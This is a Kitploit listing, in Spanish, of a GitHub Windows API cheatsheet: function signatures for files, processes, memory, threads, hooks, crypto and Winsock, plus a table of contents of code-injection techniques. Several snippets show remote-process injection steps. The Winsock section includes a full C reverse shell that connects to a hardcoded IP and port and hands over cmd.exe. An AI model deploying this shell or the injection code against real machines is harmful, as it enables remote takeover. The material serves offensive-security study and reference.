Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
windows-api-function-cheatsheets — Una referencia de llamadas a funciones de la API de Windows, incluyendo funciones para operaciones de archivos, gestión de procesos, gestión de memoria, gestión de hilos, gestión de bibliotecas de vínculos dinámicos (DLL), sincronización, comunicación entre procesos, manipulación de cadenas Unicode, manejo de errores, operaciones de red Winsock y operaciones de registro. | Kitploit
Herramientas/GitHubGitHub/7etsuo/windows-api-function-cheatsheets
Ingeniería InversaPost-ExplotaciónAnálisis de MalwareAnálisis de BinariosRecursos CuradosDesarrollo de Payloads
GitHub7etsuo/windows-api-function-cheatsheets

windows-api-function-cheatsheets

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
1.5k1695hace 1 añoRevisado por Kitploit

Acerca de

Una referencia de llamadas a funciones de la API de Windows, incluyendo funciones para operaciones de archivos, gestión de procesos, gestión de memoria, gestión de hilos, gestión de bibliotecas de vínculos dinámicos (DLL), sincronización, comunicación entre procesos, manipulación de cadenas Unicode, manejo de errores, operaciones de red Winsock y operaciones de registro.

Compartir

API CheatSheets

Hojas de referencia de funciones de la API de Windows

Contacto

🌨️ Tetsuo: https://www.x.com/tetsuo

Tabla de contenidos

  • Hojas de referencia de funciones de la API de Windows
    • Operaciones de archivos
    • Gestión de procesos
    • Gestión de memoria
    • Gestión de subprocesos
    • Gestión de bibliotecas de vínculos dinámicos (DLL)
    • Sincronización
    • Comunicación entre procesos
    • Hooks de Windows
    • Criptografía
    • Depuración
    • Winsock
    • Operaciones del Registro
    • Manejo de errores
    • Gestión de recursos
    • Funciones de cadenas Unicode
      • Longitud de cadena
      • Copia de cadena
      • Concatenación de cadenas
      • Comparación de cadenas
      • Búsqueda de cadenas
      • Clasificación y conversión de caracteres
    • Hoja de referencia de estructuras Win32
      • Estructuras comunes
      • Hoja de referencia de estructuras de sockets Win32 (winsock.h)
      • Hoja de referencia de estructuras de sockets Win32 (winsock2.h)
      • Hoja de referencia de estructuras de sockets Win32 (ws2def.h)
  • Técnicas de inyección de código
    • 1. Inyección de DLL
    • 2. Inyección de PE
    • 3. Inyección reflectiva
    • 4. Inyección APC
    • 5. Ahuecado de procesos (Reemplazo de procesos)
    • 6. AtomBombing
    • 7. Process Doppelgänging
    • 8. Process Herpaderping
    • 9. Inyección por hooking
    • 10. Inyección en memoria extra de Windows
    • 11. Inyección Propagate
    • 12. Heap Spray
    • 13. Secuestro de ejecución de subprocesos
    • 14. Module Stomping
    • 15. IAT Hooking
    • 16. Inline Hooking
    • 17. Inyección mediante depurador
    • 18. Secuestro de COM
    • 19. Phantom DLL Hollowing
    • 20. PROPagate
    • 21. Inyección Early Bird
    • 22. Inyección basada en shims
    • 23. Inyección por mapeo
    • 24. Envenenamiento de caché KnownDlls
  • Enumeración de procesos

Llamadas a funciones de la API de Windows

Operaciones de archivos

CreateFile```c HANDLE CreateFile( LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile ); // Opens an existing file or creates a new file.

root@kitploit:~
[ReadFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfile)```c
BOOL ReadFile(
  HANDLE hFile,
  LPVOID lpBuffer,
  DWORD nNumberOfBytesToRead,
  LPDWORD lpNumberOfBytesRead,
  LPOVERLAPPED lpOverlapped
); // Reads data from the specified file.

WriteFile```c BOOL WriteFile( HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped ); // Writes data to the specified file.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Gestión de procesos

OpenProcess```c HANDLE OpenProcess( [in] DWORD dwDesiredAccess, [in] BOOL bInheritHandle, [in] DWORD dwProcessId ); // Opens an existing local process object. e.g., try to open target process

root@kitploit:~
```c
hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, (DWORD) pid);

CreateProcess```c HANDLE CreateProcess( LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation ); // The CreateProcess function creates a new process that runs independently of the creating process. For simplicity, this relationship is called a parent-child relationship.

root@kitploit:~
```c
// Start the child process
// No module name (use command line), Command line, Process handle not inheritable, Thread handle not inheritable, Set handle inheritance to FALSE, No creation flags, Use parent's environment block, Use parent's starting directory, Pointer to STARTUPINFO structure, Pointer to PROCESS_INFORMATION structure
CreateProcess( NULL, argv[1], NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); 

WinExec```c UINT WinExec( [in] LPCSTR lpCmdLine, [in] UINT uCmdShow ); // Runs the specified application.

root@kitploit:~
```c
result = WinExec(L"C:\\Windows\\System32\\cmd.exe", SW_SHOWNORMAL);

TerminateProcess```c BOOL TerminateProcess( HANDLE hProcess, UINT uExitCode ); // Terminates the specified process.

root@kitploit:~
[ExitWindowsEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-exitwindowsex)```c
BOOL ExitWindowsEx(
  [in] UINT  uFlags,
  [in] DWORD dwReason
); // Logs off the interactive user, shuts down the system, or shuts down and restarts the system.
root@kitploit:~
bResult = ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_APPLICATION);

CreateToolhelp32Snapshot```c HANDLE CreateToolhelp32Snapshot( [in] DWORD dwFlags, [in] DWORD th32ProcessID ); // used to obtain information about processes and threads running on a Windows system.

root@kitploit:~
[Process32First](https://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-process32first)```c
BOOL Process32First(
  [in]      HANDLE           hSnapshot,
  [in, out] LPPROCESSENTRY32 lppe
); // used to retrieve information about the first process encountered in a system snapshot, which is typically taken using the CreateToolhelp32Snapshot function.

Process32Next```c BOOL Process32Next( [in] HANDLE hSnapshot, [out] LPPROCESSENTRY32 lppe ); // used to retrieve information about the next process in a system snapshot after Process32First has been called. This function is typically used in a loop to enumerate all processes captured in a snapshot taken using the CreateToolhelp32Snapshot function.

root@kitploit:~
[WriteProcessMemory](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory)```c
BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
); // Writes data to an area of memory in a specified process. The entire area to be written to must be accessible or the operation fails.
root@kitploit:~
WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL); // pRemoteCode from VirtualAllocEx

ReadProcessMemory```c BOOL ReadProcessMemory( [in] HANDLE hProcess, [in] LPCVOID lpBaseAddress, [out] LPVOID lpBuffer, [in] SIZE_T nSize, [out] SIZE_T *lpNumberOfBytesRead ); // ReadProcessMemory copies the data in the specified address range from the address space of the specified process into the specified buffer of the current process.

root@kitploit:~
```c
bResult = ReadProcessMemory(pHandle, (void*)baseAddress, &address, sizeof(address), 0);

Gestión de memoria

VirtualAlloc```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, // Shellcode must be between 0x1 and 0x10000 bytes (page size) DWORD flAllocationType, // #define MEM_COMMIT 0x00001000 DWORD flProtect // #define PAGE_EXECUTE_READWRITE 0x00000040
); // Reserves, commits, or changes the state of a region of memory within the virtual address space of the calling process.

root@kitploit:~
[VirtualAllocEx](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex)```c
LPVOID VirtualAllocEx(
  [in]           HANDLE hProcess,
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
); // Reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.
root@kitploit:~
pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);

VirtualFree```c BOOL VirtualFree( LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType ); // Releases, decommits, or releases and decommits a region of memory within the virtual address space of the calling process.

root@kitploit:~
[función VirtualProtect (memoryapi.h)](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)```c
BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
); // Changes the protection on a region of committed pages in the virtual address space of the calling process.

RtlMoveMemory```c VOID RtlMoveMemory( Out VOID UNALIGNED *Destination, In const VOID UNALIGNED *Source, In SIZE_T Length ); // Copies the contents of a source memory block to a destination memory block, and supports overlapping source and destination memory blocks.

root@kitploit:~
### Gestión de hilos
[CreateThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread)```c
HANDLE CreateThread(
  [in, optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes,         // A pointer to a SECURITY_ATTRIBUTES structure that specifies a security descriptor for the new thread and determines whether child processes can inherit the returned handle.
  [in]            SIZE_T                  dwStackSize,                // The initial size of the stack, in bytes.
  [in]            LPTHREAD_START_ROUTINE  lpStartAddress,             // A pointer to the application-defined function of type LPTHREAD_START_ROUTINE
  [in, optional]  __drv_aliasesMem LPVOID lpParameter,                // A pointer to a variable to be passed to the thread function.
  [in]            DWORD                   dwCreationFlags,            // The flags that control the creation of the thread.
  [out, optional] LPDWORD                 lpThreadId                  // A pointer to a variable that receives the thread identifier. If this parameter is NULL, the thread identifier is not returned.
); // Creates a thread to execute within the virtual address space of the calling process.
root@kitploit:~
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); WaitForSingleObject(th, 0);

CreateRemoteThread```c HANDLE CreateRemoteThread( [in] HANDLE hProcess, [in] LPSECURITY_ATTRIBUTES lpThreadAttributes, [in] SIZE_T dwStackSize, [in] LPTHREAD_START_ROUTINE lpStartAddress, [in] LPVOID lpParameter, [in] DWORD dwCreationFlags, [out] LPDWORD lpThreadId ); // Creates a thread that runs in the virtual address space of another process.

root@kitploit:~
```c
hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL); // pRemoteCode from VirtualAllocEx filled by WriteProcessMemory

CreateRemoteThreadEx```c HANDLE CreateRemoteThreadEx( [in] HANDLE hProcess, [in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes, [in] SIZE_T dwStackSize, [in] LPTHREAD_START_ROUTINE lpStartAddress, [in, optional] LPVOID lpParameter, [in] DWORD dwCreationFlags, [in, optional] LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, [out, optional] LPDWORD lpThreadId ); // Creates a thread that runs in the virtual address space of another process and optionally specifies extended attributes such as processor group affinity. // See InitializeProcThreadAttributeList

root@kitploit:~
```c
hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, lpAttributeList, NULL); // pRemoteCode from VirtualAllocEx filled by WriteProcessMemory

ExitThread```c VOID ExitThread( DWORD dwExitCode ); // Terminates the calling thread and returns the exit code to the operating system.

root@kitploit:~
[GetExitCodeThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getexitcodethread)```c
BOOL GetExitCodeThread(
  HANDLE hThread,
  LPDWORD lpExitCode
); // Retrieves the termination status of the specified thread.

ResumeThread```c DWORD ResumeThread( HANDLE hThread ); // Decrements a thread's suspend count. When the suspend count is decremented to zero, the execution of the thread is resumed.

root@kitploit:~
[SuspendThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread)```c
DWORD SuspendThread(
  HANDLE hThread
); // Suspends the specified thread.

TerminateThread```c BOOL TerminateThread( HANDLE hThread, DWORD dwExitCode ); // Terminates the specified thread.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Gestión de la biblioteca de vínculos dinámicos (DLL)

LoadLibrary```c HMODULE LoadLibrary( LPCTSTR lpFileName ); // Loads a dynamic-link library (DLL) module into the address space of the calling process.

root@kitploit:~
[LoadLibraryExA](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa)```c
HMODULE LoadLibraryExA(
  [in] LPCSTR lpLibFileName,
       HANDLE hFile,
  [in] DWORD  dwFlags
); // Loads the specified module into the address space of the calling process, with additional options.
root@kitploit:~
HMODULE hModule = LoadLibraryExA("ws2_32.dll", NULL, LOAD_LIBRARY_SAFE_CURRENT_DIRS);

GetProcAddress```c FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName ); // Retrieves the address of an exported function or variable from the specified DLL.

root@kitploit:~
```c
pLoadLibrary = (PTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA");

FreeLibrary```c BOOL FreeLibrary( HMODULE hModule ); // Frees the loaded DLL module and, if necessary, decrements its reference count.

root@kitploit:~
### Sincronización
[CreateMutex](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createmutexa)```c
HANDLE CreateMutex(
  LPSECURITY_ATTRIBUTES lpMutexAttributes,
  BOOL bInitialOwner,
  LPCTSTR lpName
); // Creates a named or unnamed mutex object.

CreateSemaphore```c HANDLE CreateSemaphore( LPSECURITY_ATTRIBUTES lpSemaphoreAttributes, LONG lInitialCount, LONG lMaximumCount, LPCTSTR lpName ); // Creates a named or unnamed semaphore object.

root@kitploit:~
[ReleaseMutex](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-releasemutex)```c
BOOL ReleaseMutex(
  HANDLE hMutex
); // Releases ownership of the specified mutex object.

ReleaseSemaphore```c BOOL ReleaseSemaphore( HANDLE hSemaphore, LONG lReleaseCount, LPLONG lpPreviousCount ); // Increases the count of the specified semaphore object by a specified amount.

root@kitploit:~
[WaitForSingleObject](https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)```c
DWORD WaitForSingleObject(
  [in] HANDLE hHandle,
  [in] DWORD  dwMilliseconds
); // Waits until the specified object is in the signaled state or the time-out interval elapses.
root@kitploit:~
WaitForSingleObject(hThread, 500);

Comunicación entre procesos

CreatePipe```c BOOL CreatePipe( PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize ); // Creates an anonymous pipe and returns handles to the read and write ends of the pipe.

root@kitploit:~
[CreateNamedPipe](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createnamedpipea)```c
HANDLE CreateNamedPipe(
  LPCTSTR lpName,
  DWORD dwOpenMode,
  DWORD dwPipeMode,
  DWORD nMaxInstances,
  DWORD nOutBufferSize,
  DWORD nInBufferSize,
  DWORD nDefaultTimeOut,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes
); // Creates a named pipe and returns a handle for subsequent pipe operations.

ConnectNamedPipe```c BOOL ConnectNamedPipe( HANDLE hNamedPipe, LPOVERLAPPED lpOverlapped ); // Enables a named pipe server process to wait for a client process to connect to an instance of a named pipe.

root@kitploit:~
[DisconnectNamedPipe](https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-disconnectnamedpipe)```c
BOOL DisconnectNamedPipe(
  HANDLE hNamedPipe
); // Disconnects the server end of a named pipe instance from a client process.

CreateFileMapping```c HANDLE CreateFileMapping( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCTSTR lpName ); // Creates or opens a named or unnamed file mapping object for a specified file.

root@kitploit:~
[MapViewOfFile](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-mapviewoffile)```c
LPVOID MapViewOfFile(
  HANDLE hFileMappingObject,
  DWORD dwDesiredAccess,
  DWORD dwFileOffsetHigh,
  DWORD dwFileOffsetLow,
  SIZE_T dwNumberOfBytesToMap
); // Maps a view of a file mapping into the address space of the calling process.

UnmapViewOfFile```c BOOL UnmapViewOfFile( LPCVOID lpBaseAddress ); // Unmaps a mapped view of a file from the calling process's address space.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Hooks de Windows

SetWindowsHookExA```c HHOOK SetWindowsHookExA( [in] int idHook, [in] HOOKPROC lpfn, [in] HINSTANCE hmod, [in] DWORD dwThreadId ); // Installs an application-defined hook procedure into a hook chain. You would install a hook procedure to monitor the system for certain types of events. These events are associated either with a specific thread or with all threads in the same desktop as the calling thread.

root@kitploit:~
[CallNextHookEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callnexthookex)```c
LRESULT CallNextHookEx(
  [in, optional] HHOOK  hhk,
  [in]           int    nCode,
  [in]           WPARAM wParam,
  [in]           LPARAM lParam
); // Passes the hook information to the next hook procedure in the current hook chain. A hook procedure can call this function either before or after processing the hook information.

UnhookWindowsHookEx```c BOOL UnhookWindowsHookEx( [in] HHOOK hhk ); // Removes a hook procedure installed in a hook chain by the SetWindowsHookEx function.

root@kitploit:~
[GetAsyncKeyState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate)```c
SHORT GetAsyncKeyState(
  [in] int vKey
); // Determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.

GetKeyState```c SHORT GetKeyState( [in] int nVirtKey ); // Retrieves the status of the specified virtual key. The status specifies whether the key is up, down, or toggled (on, off—alternating each time the key is pressed).

root@kitploit:~
[GetKeyboardState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getkeyboardstate)```c
BOOL GetKeyboardState(
  [out] PBYTE lpKeyState
); // Copies the status of the 256 virtual keys to the specified buffer.

Criptografía

CryptBinaryToStringA```c BOOL CryptBinaryToStringA( [in] const BYTE *pbBinary, [in] DWORD cbBinary, [in] DWORD dwFlags, [out, optional] LPSTR pszString, [in, out] DWORD *pcchString ); // The CryptBinaryToString function converts an array of bytes into a formatted string.

root@kitploit:~
[CryptDecrypt](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecrypt)```c
BOOL CryptDecrypt(
  [in]      HCRYPTKEY  hKey,
  [in]      HCRYPTHASH hHash,
  [in]      BOOL       Final,
  [in]      DWORD      dwFlags,
  [in, out] BYTE       *pbData,
  [in, out] DWORD      *pdwDataLen
); // The CryptDecrypt function decrypts data previously encrypted by using the CryptEncrypt function.

CryptEncrypt```c BOOL CryptEncrypt( [in] HCRYPTKEY hKey, [in] HCRYPTHASH hHash, [in] BOOL Final, [in] DWORD dwFlags, [in, out] BYTE *pbData, [in, out] DWORD *pdwDataLen, [in] DWORD dwBufLen ); // The CryptEncrypt function encrypts data. The algorithm used to encrypt the data is designated by the key held by the CSP module and is referenced by the hKey parameter.

root@kitploit:~
[CryptDecryptMessage](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecryptmessage)```c
BOOL CryptDecryptMessage(
  [in]                PCRYPT_DECRYPT_MESSAGE_PARA pDecryptPara,
  [in]                const BYTE                  *pbEncryptedBlob,
  [in]                DWORD                       cbEncryptedBlob,
  [out, optional]     BYTE                        *pbDecrypted,
  [in, out, optional] DWORD                       *pcbDecrypted,
  [out, optional]     PCCERT_CONTEXT              *ppXchgCert
); // The CryptDecryptMessage function decodes and decrypts a message.

CryptEncryptMessage```c BOOL CryptEncryptMessage( [in] PCRYPT_ENCRYPT_MESSAGE_PARA pEncryptPara, [in] DWORD cRecipientCert, [in] PCCERT_CONTEXT [] rgpRecipientCert, [in] const BYTE *pbToBeEncrypted, [in] DWORD cbToBeEncrypted, [out] BYTE *pbEncryptedBlob, [in, out] DWORD *pcbEncryptedBlob ); // The CryptEncryptMessage function encrypts and encodes a message.

root@kitploit:~
### Depuración
[IsDebuggerPresent](https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-isdebuggerpresent)```c
BOOL IsDebuggerPresent(); // Determines whether the calling process is being debugged by a user-mode debugger.

CheckRemoteDebuggerPresent```c BOOL CheckRemoteDebuggerPresent( [in] HANDLE hProcess, [in, out] PBOOL pbDebuggerPresent ); // Determines whether the specified process is being debugged.

root@kitploit:~
[OutputDebugStringA](https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-outputdebugstringa)```c
void OutputDebugStringA(
  [in, optional] LPCSTR lpOutputString
); // Sends a string to the debugger for display.

Winsock```c

/*** Windows Reverse Shell *

  • ██████ ███▄ █ ▒█████ █ █░ ▄████▄ ██▀███ ▄▄▄ ██████ ██░ ██
  • ▒██ ▒ ██ ▀█ █ ▒██▒ ██▒▓█░ █ ░█░▒██▀ ▀█ ▓██ ▒ ██▒▒████▄ ▒██ ▒ ▓██░ ██▒
  • ░ ▓██▄ ▓██ ▀█ ██▒▒██░ ██▒▒█░ █ ░█ ▒▓█ ▄ ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▓██▄ ▒██▀▀██░
  • ▒ ██▒▓██▒ ▐▌██▒▒██ ██░░█░ █ ░█ ▒▓▓▄ ▄██▒▒██▀▀█▄ ░██▄▄▄▄██ ▒ ██▒░▓█ ░██
  • ▒██████▒▒▒██░ ▓██░░ ████▓▒░░░██▒██▓ ▒ ▓███▀ ░░██▓ ▒██▒ ▓█ ▓██▒▒██████▒▒░▓█▒░██▓
  • ▒ ▒▓▒ ▒ ░░ ▒░ ▒ ▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ░▒ ▒ ░░ ▒▓ ░▒▓░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒
  • ░ ░▒ ░ ░░ ░░ ░ ▒░ ░ ▒ ▒░ ▒ ░ ░ ░ ▒ ░▒ ░ ▒░ ▒ ▒▒ ░░ ░▒ ░ ░ ▒ ░▒░ ░
  • ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░
  • root@kitploit:~
      ░           ░     ░ ░      ░    ░ ░         ░           ░  ░      ░   ░  ░  ░
    
  • root@kitploit:~
                                  Written by: [email protected] (snowcra5h) 2023
    
  • This program establishes a reverse shell via the Winsock2 library. It is
  • designed to establish a connection to a specified remote server, and execute commands
  • received from the server on the local machine, giving the server
  • control over the local machine.
  • Compile command (using MinGW on Wine):
  • wine gcc.exe windows.c -o windows.exe -lws2_32
  • This code is intended for educational and legitimate penetration testing purposes only.
  • Please use responsibly and ethically.

*/

#include <winsock2.h> #include <ws2tcpip.h> #include <stdio.h> #include <windows.h> #include <process.h>

const char* const PORT = "1337"; const char* const IP = "10.37.129.2";

typedef struct { HANDLE hPipeRead; HANDLE hPipeWrite; SOCKET sock; } ThreadParams;

DWORD WINAPI OutputThreadFunc(LPVOID data); DWORD WINAPI InputThreadFunc(LPVOID data); void CleanUp(HANDLE hInputWrite, HANDLE hInputRead, HANDLE hOutputWrite, HANDLE hOutputRead, PROCESS_INFORMATION processInfo, addrinfo* result, SOCKET sock);

int main(int argc, char** argv) { WSADATA wsaData; int err = WSAStartup(MAKEWORD(2, 2), &wsaData); if (err != 0) { fprintf(stderr, "WSAStartup failed: %d\n", err); return 1; }

root@kitploit:~
SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, WSA_FLAG_OVERLAPPED);
if (sock == INVALID_SOCKET) {
    fprintf(stderr, "Socket function failed with error = %d\n", WSAGetLastError());
    WSACleanup();
    return 1;
}

struct addrinfo hints = { 0 };
hints.ai_family = AF_INET;
hints.ai_socktype = SOCK_STREAM;
struct addrinfo* result;
err = getaddrinfo(IP, PORT, &hints, &result);
if (err != 0) {
    fprintf(stderr, "Failed to get address info: %d\n", err);
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

if (WSAConnect(sock, result->ai_addr, (int)result->ai_addrlen, NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
    fprintf(stderr, "Failed to connect.\n");
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

SECURITY_ATTRIBUTES sa = { sizeof(SECURITY_ATTRIBUTES), NULL, TRUE };
HANDLE hInputWrite, hOutputRead, hInputRead, hOutputWrite;
if (!CreatePipe(&hOutputRead, &hOutputWrite, &sa, 0) || !CreatePipe(&hInputRead, &hInputWrite, &sa, 0)) {
    fprintf(stderr, "Failed to create pipe.\n");
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

STARTUPINFO startupInfo = { 0 };
startupInfo.cb = sizeof(startupInfo);
startupInfo.dwFlags = STARTF_USESTDHANDLES;
startupInfo.hStdInput = hInputRead;
startupInfo.hStdOutput = hOutputWrite;
startupInfo.hStdError = hOutputWrite;
PROCESS_INFORMATION processInfo;

WCHAR cmd[] = L"cmd.exe /k";
if (!CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &startupInfo, &processInfo)) {
    fprintf(stderr, "Failed to create process.\n");
    CleanUp(hInputWrite, hInputRead, hOutputWrite, hOutputRead, processInfo, result, sock);
    return 1;
}

CloseHandle(hInputRead);
CloseHandle(hOutputWrite);
CloseHandle(processInfo.hThread);
ThreadParams outputParams = { hOutputRead, NULL, sock };
ThreadParams inputParams = { NULL, hInputWrite, sock };
HANDLE hThread[2];
hThread[0] = CreateThread(NULL, 0, OutputThreadFunc, &outputParams, 0, NULL);
hThread[1] = CreateThread(NULL, 0, InputThreadFunc, &inputParams, 0, NULL);

WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
CleanUp(hInputWrite, NULL, NULL, hOutputRead, processInfo, result, sock);
return 0;

}

void CleanUp(HANDLE hInputWrite, HANDLE hInputRead, HANDLE hOutputWrite, HANDLE hOutputRead, PROCESS_INFORMATION processInfo, addrinfo* result, SOCKET sock) { if (hInputWrite != NULL) CloseHandle(hInputWrite); if (hInputRead != NULL) CloseHandle(hInputRead); if (hOutputWrite != NULL) CloseHandle(hOutputWrite); if (hOutputRead != NULL) CloseHandle(hOutputRead); if (processInfo.hProcess != NULL) CloseHandle(processInfo.hProcess); if (processInfo.hThread != NULL) CloseHandle(processInfo.hThread); if (result != NULL) freeaddrinfo(result); if (sock != NULL) closesocket(sock); WSACleanup(); }

DWORD WINAPI OutputThreadFunc(LPVOID data) { ThreadParams* params = (ThreadParams*)data; char buffer[4096]; DWORD bytesRead; while (ReadFile(params->hPipeRead, buffer, sizeof(buffer) - 1, &bytesRead, NULL)) { buffer[bytesRead] = '\0'; send(params->sock, buffer, bytesRead, 0); } return 0; }

DWORD WINAPI InputThreadFunc(LPVOID data) { ThreadParams* params = (ThreadParams*)data; char buffer[4096]; int bytesRead; while ((bytesRead = recv(params->sock, buffer, sizeof(buffer) - 1, 0)) > 0) { DWORD bytesWritten; WriteFile(params->hPipeWrite, buffer, bytesRead, &bytesWritten, NULL); } return 0; }

root@kitploit:~
[WSAStartup](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsastartup)```c
int WSAStartup(
    WORD wVersionRequired, 
    LPWSADATA lpWSAData
); // Initializes the Winsock library for an application. Must be called before any other Winsock functions.

WSAConnect```c int WSAConnect( SOCKET s, // Descriptor identifying a socket. const struct sockaddr* name, // Pointer to the sockaddr structure for the connection target. int namelen, // Length of the sockaddr structure. LPWSABUF lpCallerData, // Pointer to user data to be transferred during connection. LPWSABUF lpCalleeData, // Pointer to user data transferred back during connection. LPQOS lpSQOS, // Pointer to flow specs for socket s, one for each direction. LPQOS lpGQOS // Pointer to flow specs for the socket group. ); // Establishes a connection to another socket application.This function is similar to connect, but allows for more control over the connection process.

root@kitploit:~
[WSASend](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasend)```c
int WSASend(
    SOCKET s, // Descriptor identifying a connected socket.
    LPWSABUF lpBuffers, // Array of buffers for data to be sent.
    DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
    LPDWORD lpNumberOfBytesSent, // Pointer to the number of bytes sent by this function call.
    DWORD dwFlags, // Flags to modify the behavior of the function call.
    LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the send operation has been completed.
); // Sends data on a connected socket.It can be used for both synchronous and asynchronous data transfer.

